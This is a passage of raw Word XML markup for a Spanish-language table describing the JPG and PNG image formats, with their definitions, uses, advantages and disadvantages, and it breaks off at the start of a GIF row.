                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003E2474" w:rsidRDefault="003E2474" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003E2474" w:rsidRDefault="003E2474" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="003E2474" w:rsidRDefault="003E2474" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="004818BC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>JPG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">Son las siglas de Joint Photographic Experts Group, el nombre del grupo que creó este formato. jpg es un formato de compresión de imágenes, tanto en color como en escala de grises, </w:t>
            </w:r>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">con alta calidad (a todo color). </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="003E2474" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2474">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>El formato JPEG o JPG es utilizado como extensión predeterminada por las cámaras digitales debido a que permite comprimirlas sin necesidad de bajar su calidad en la resolución</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="003E2474" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2474">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Soporta los modos de color CMYK, RGB y escala de grises.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="003E2474" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2474">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Tiene una versatilidad muy buena.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="003E2474" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2474">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Una comprensión bastante alta.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="003E2474" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2474">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Formato con pérdida de información.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="003E2474" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E2474">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Pérdida de calidad al momento de modificar.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="003E2474">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004818BC" w:rsidRPr="00F821FC" w:rsidTr="004818BC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>PNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">Son las siglas de Portable Network Graphics, un formato de compresión de imágenes aprobado por el World Wide Web Consortium (W3C) como sustituto del formato .gif. Los archivo tipo .gif utilizan un algoritmo de compresión de datos que está patentado, mientras que el formato .png no está patentado y </w:t>
            </w:r>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>no necesita licencia para su utilización.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">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eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Permite el uso de transparencias con bastante profundidad, ya sea completa o en ciertos píxeles utilizando dife</w:t>
            </w:r>
            <w:r w:rsidR="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>rentes canales.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">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eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Si bien no son óptimas para diseño de impresión de alto nivel, sí se utilizan para diseño web, o en condiciones no profesionales, debido a su peso moderado y buena administración del color.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">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eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Admite la compresión sin pérdida de alto nivel.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">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eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Admite la transparencia del canal alfa.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">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eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Admite la corrección gamma.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">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eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Es compatible con los exploradores web.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">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eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Los programas antiguos no admiten archivos PNG.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00AD1843" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">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eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD1843">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>No ofrece ningún soporte para archivos con varias imágenes o GIFs.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004818BC" w:rsidRPr="00F821FC" w:rsidTr="004818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AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00AD1843" w:rsidRDefault="00AD1843" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F821FC" w:rsidRPr="00F821FC" w:rsidRDefault="00F821FC" w:rsidP="00AD1843">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F821FC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>GIF</w:t>
            </w:r>
